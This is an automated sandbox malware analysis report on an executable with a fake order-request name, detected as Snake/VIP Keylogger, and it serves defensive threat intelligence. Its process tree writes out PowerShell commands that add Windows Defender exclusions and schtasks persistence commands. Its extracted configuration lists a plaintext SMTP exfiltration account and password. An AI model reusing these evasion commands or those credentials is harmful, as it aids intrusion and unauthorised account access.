Edit tour

Windows Analysis Report
INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Overview

General Information

Sample name:	INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
Analysis ID:	1618870
MD5:	379881c017323bbb89ba4617d0d3df7c
SHA1:	a57be5d3ca8e6410f411cbb8582334601e15c479
SHA256:	58c1bb1c19cd551261465044f769a313549a574a345a2754414e48f8fc08bcbf
Tags:	exeuser-julianmckein
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe" MD5: 379881C017323BBB89BA4617D0D3DF7C)

powershell.exe (PID: 7612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nDEusQ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8008 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7744 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe (PID: 7896 cmdline: "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe" MD5: 379881C017323BBB89BA4617D0D3DF7C)

nDEusQ.exe (PID: 7984 cmdline: C:\Users\user\AppData\Roaming\nDEusQ.exe MD5: 379881C017323BBB89BA4617D0D3DF7C)

schtasks.exe (PID: 8184 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmp710.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nDEusQ.exe (PID: 4524 cmdline: "C:\Users\user\AppData\Roaming\nDEusQ.exe" MD5: 379881C017323BBB89BA4617D0D3DF7C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "587", "Password": "sales02@tmcksa.com", "Host": "smartyok4#", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sales02@tmcksa.com", "Password": "smartyok4#", "Host": "mail.tmcksa.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e2ee:$a1: get_encryptedPassword 0x7210e:$a1: get_encryptedPassword 0xb5d2e:$a1: get_encryptedPassword 0x2e617:$a2: get_encryptedUsername 0x72437:$a2: get_encryptedUsername 0xb6057:$a2: get_encryptedUsername 0x2e0fe:$a3: get_timePasswordChanged 0x71f1e:$a3: get_timePasswordChanged 0xb5b3e:$a3: get_timePasswordChanged 0x2e207:$a4: get_passwordField 0x72027:$a4: get_passwordField 0xb5c47:$a4: get_passwordField 0x2e304:$a5: set_encryptedPassword 0x72124:$a5: set_encryptedPassword 0xb5d44:$a5: set_encryptedPassword 0x2f98c:$a7: get_logins 0x737ac:$a7: get_logins 0xb73cc:$a7: get_logins 0x2f8ef:$a10: KeyLoggerEventArgs 0x7370f:$a10: KeyLoggerEventArgs 0xb732f:$a10: KeyLoggerEventArgs
0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2f21e:$a1: get_encryptedPassword 0x7303e:$a1: get_encryptedPassword 0xb6c5e:$a1: get_encryptedPassword 0x2f547:$a2: get_encryptedUsername 0x73367:$a2: get_encryptedUsername 0xb6f87:$a2: get_encryptedUsername 0x2f02e:$a3: get_timePasswordChanged 0x72e4e:$a3: get_timePasswordChanged 0xb6a6e:$a3: get_timePasswordChanged 0x2f137:$a4: get_passwordField 0x72f57:$a4: get_passwordField 0xb6b77:$a4: get_passwordField 0x2f234:$a5: set_encryptedPassword 0x73054:$a5: set_encryptedPassword 0xb6c74:$a5: set_encryptedPassword 0x308bc:$a7: get_logins 0x746dc:$a7: get_logins 0xb82fc:$a7: get_logins 0x3081f:$a10: KeyLoggerEventArgs 0x7463f:$a10: KeyLoggerEventArgs 0xb825f:$a10: KeyLoggerEventArgs
Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3315:$a1: get_encryptedPassword 0x3634:$a2: get_encryptedUsername 0x312f:$a3: get_timePasswordChanged 0x3238:$a4: get_passwordField 0x332b:$a5: set_encryptedPassword 0x5809:$a7: get_logins 0x576c:$a10: KeyLoggerEventArgs 0x53d5:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7896	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7896	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: nDEusQ.exe PID: 7984	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: nDEusQ.exe PID: 7984	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: nDEusQ.exe PID: 7984	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: nDEusQ.exe PID: 7984	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: nDEusQ.exe PID: 7984	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x207b9:$a1: get_encryptedPassword 0x20ad8:$a2: get_encryptedUsername 0x205d3:$a3: get_timePasswordChanged 0x206dc:$a4: get_passwordField 0x207cf:$a5: set_encryptedPassword 0x22cad:$a7: get_logins 0x22c10:$a10: KeyLoggerEventArgs 0x22879:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: nDEusQ.exe PID: 4524	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: nDEusQ.exe PID: 4524	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: nDEusQ.exe PID: 4524	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.nDEusQ.exe.429ad58.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.nDEusQ.exe.429ad58.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.nDEusQ.exe.429ad58.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.nDEusQ.exe.429ad58.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c4e6:$a1: get_encryptedPassword 0x2c80f:$a2: get_encryptedUsername 0x2c2f6:$a3: get_timePasswordChanged 0x2c3ff:$a4: get_passwordField 0x2c4fc:$a5: set_encryptedPassword 0x2db84:$a7: get_logins 0x2dae7:$a10: KeyLoggerEventArgs 0x2d74c:$a11: KeyLoggerEventArgsEventHandler
10.2.nDEusQ.exe.429ad58.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a212:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x398b5:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b12:$a4: \Orbitum\User Data\Default\Login Data 0x3a4f1:$a5: \Kometa\User Data\Default\Login Data
10.2.nDEusQ.exe.4256f38.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.nDEusQ.exe.4256f38.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.nDEusQ.exe.4256f38.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.nDEusQ.exe.429ad58.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d108:$s1: UnHook 0x2d10f:$s2: SetHook 0x2d117:$s3: CallNextHook 0x2d124:$s4: _hook
10.2.nDEusQ.exe.4256f38.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c4e6:$a1: get_encryptedPassword 0x2c80f:$a2: get_encryptedUsername 0x2c2f6:$a3: get_timePasswordChanged 0x2c3ff:$a4: get_passwordField 0x2c4fc:$a5: set_encryptedPassword 0x2db84:$a7: get_logins 0x2dae7:$a10: KeyLoggerEventArgs 0x2d74c:$a11: KeyLoggerEventArgsEventHandler
9.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef08:$s1: UnHook 0x2ef0f:$s2: SetHook 0x2ef17:$s3: CallNextHook 0x2ef24:$s4: _hook
1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c4e6:$a1: get_encryptedPassword 0x2c80f:$a2: get_encryptedUsername 0x2c2f6:$a3: get_timePasswordChanged 0x2c3ff:$a4: get_passwordField 0x2c4fc:$a5: set_encryptedPassword 0x2db84:$a7: get_logins 0x2dae7:$a10: KeyLoggerEventArgs 0x2d74c:$a11: KeyLoggerEventArgsEventHandler
10.2.nDEusQ.exe.4256f38.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a212:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x398b5:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b12:$a4: \Orbitum\User Data\Default\Login Data 0x3a4f1:$a5: \Kometa\User Data\Default\Login Data
1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a212:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x398b5:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b12:$a4: \Orbitum\User Data\Default\Login Data 0x3a4f1:$a5: \Kometa\User Data\Default\Login Data
10.2.nDEusQ.exe.4256f38.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d108:$s1: UnHook 0x2d10f:$s2: SetHook 0x2d117:$s3: CallNextHook 0x2d124:$s4: _hook
1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d108:$s1: UnHook 0x2d10f:$s2: SetHook 0x2d117:$s3: CallNextHook 0x2d124:$s4: _hook
10.2.nDEusQ.exe.429ad58.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.nDEusQ.exe.429ad58.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.nDEusQ.exe.429ad58.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.nDEusQ.exe.429ad58.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e2e6:$a1: get_encryptedPassword 0x71f06:$a1: get_encryptedPassword 0x2e60f:$a2: get_encryptedUsername 0x7222f:$a2: get_encryptedUsername 0x2e0f6:$a3: get_timePasswordChanged 0x71d16:$a3: get_timePasswordChanged 0x2e1ff:$a4: get_passwordField 0x71e1f:$a4: get_passwordField 0x2e2fc:$a5: set_encryptedPassword 0x71f1c:$a5: set_encryptedPassword 0x2f984:$a7: get_logins 0x735a4:$a7: get_logins 0x2f8e7:$a10: KeyLoggerEventArgs 0x73507:$a10: KeyLoggerEventArgs 0x2f54c:$a11: KeyLoggerEventArgsEventHandler 0x7316c:$a11: KeyLoggerEventArgsEventHandler
10.2.nDEusQ.exe.429ad58.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c012:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7fc32:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b6b5:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f2d5:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b912:$a4: \Orbitum\User Data\Default\Login Data 0x7f532:$a4: \Orbitum\User Data\Default\Login Data 0x3c2f1:$a5: \Kometa\User Data\Default\Login Data 0x7ff11:$a5: \Kometa\User Data\Default\Login Data
10.2.nDEusQ.exe.429ad58.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef08:$s1: UnHook 0x72b28:$s1: UnHook 0x2ef0f:$s2: SetHook 0x72b2f:$s2: SetHook 0x2ef17:$s3: CallNextHook 0x72b37:$s3: CallNextHook 0x2ef24:$s4: _hook 0x72b44:$s4: _hook
1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e2e6:$a1: get_encryptedPassword 0x71f06:$a1: get_encryptedPassword 0x2e60f:$a2: get_encryptedUsername 0x7222f:$a2: get_encryptedUsername 0x2e0f6:$a3: get_timePasswordChanged 0x71d16:$a3: get_timePasswordChanged 0x2e1ff:$a4: get_passwordField 0x71e1f:$a4: get_passwordField 0x2e2fc:$a5: set_encryptedPassword 0x71f1c:$a5: set_encryptedPassword 0x2f984:$a7: get_logins 0x735a4:$a7: get_logins 0x2f8e7:$a10: KeyLoggerEventArgs 0x73507:$a10: KeyLoggerEventArgs 0x2f54c:$a11: KeyLoggerEventArgsEventHandler 0x7316c:$a11: KeyLoggerEventArgsEventHandler
1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c012:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7fc32:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b6b5:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f2d5:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b912:$a4: \Orbitum\User Data\Default\Login Data 0x7f532:$a4: \Orbitum\User Data\Default\Login Data 0x3c2f1:$a5: \Kometa\User Data\Default\Login Data 0x7ff11:$a5: \Kometa\User Data\Default\Login Data
1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef08:$s1: UnHook 0x72b28:$s1: UnHook 0x2ef0f:$s2: SetHook 0x72b2f:$s2: SetHook 0x2ef17:$s3: CallNextHook 0x72b37:$s3: CallNextHook 0x2ef24:$s4: _hook 0x72b44:$s4: _hook
10.2.nDEusQ.exe.4256f38.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.nDEusQ.exe.4256f38.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.nDEusQ.exe.4256f38.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.nDEusQ.exe.4256f38.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e2e6:$a1: get_encryptedPassword 0x72106:$a1: get_encryptedPassword 0xb5d26:$a1: get_encryptedPassword 0x2e60f:$a2: get_encryptedUsername 0x7242f:$a2: get_encryptedUsername 0xb604f:$a2: get_encryptedUsername 0x2e0f6:$a3: get_timePasswordChanged 0x71f16:$a3: get_timePasswordChanged 0xb5b36:$a3: get_timePasswordChanged 0x2e1ff:$a4: get_passwordField 0x7201f:$a4: get_passwordField 0xb5c3f:$a4: get_passwordField 0x2e2fc:$a5: set_encryptedPassword 0x7211c:$a5: set_encryptedPassword 0xb5d3c:$a5: set_encryptedPassword 0x2f984:$a7: get_logins 0x737a4:$a7: get_logins 0xb73c4:$a7: get_logins 0x2f8e7:$a10: KeyLoggerEventArgs 0x73707:$a10: KeyLoggerEventArgs 0xb7327:$a10: KeyLoggerEventArgs
10.2.nDEusQ.exe.4256f38.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c012:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7fe32:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc3a52:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b6b5:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f4d5:$a3: \Google\Chrome\User Data\Default\Login Data 0xc30f5:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b912:$a4: \Orbitum\User Data\Default\Login Data 0x7f732:$a4: \Orbitum\User Data\Default\Login Data 0xc3352:$a4: \Orbitum\User Data\Default\Login Data 0x3c2f1:$a5: \Kometa\User Data\Default\Login Data 0x80111:$a5: \Kometa\User Data\Default\Login Data 0xc3d31:$a5: \Kometa\User Data\Default\Login Data
10.2.nDEusQ.exe.4256f38.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef08:$s1: UnHook 0x72d28:$s1: UnHook 0xb6948:$s1: UnHook 0x2ef0f:$s2: SetHook 0x72d2f:$s2: SetHook 0xb694f:$s2: SetHook 0x2ef17:$s3: CallNextHook 0x72d37:$s3: CallNextHook 0xb6957:$s3: CallNextHook 0x2ef24:$s4: _hook 0x72d44:$s4: _hook 0xb6964:$s4: _hook
Click to see the 32 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", ParentImage: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ParentProcessId: 7440, ParentProcessName: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", ProcessId: 7612, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmp710.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmp710.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\nDEusQ.exe, ParentImage: C:\Users\user\AppData\Roaming\nDEusQ.exe, ParentProcessId: 7984, ParentProcessName: nDEusQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmp710.tmp", ProcessId: 8184, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 192.254.185.123, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, Initiated: true, ProcessId: 7896, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49751

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", ParentImage: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ParentProcessId: 7440, ParentProcessName: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp", ProcessId: 7744, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

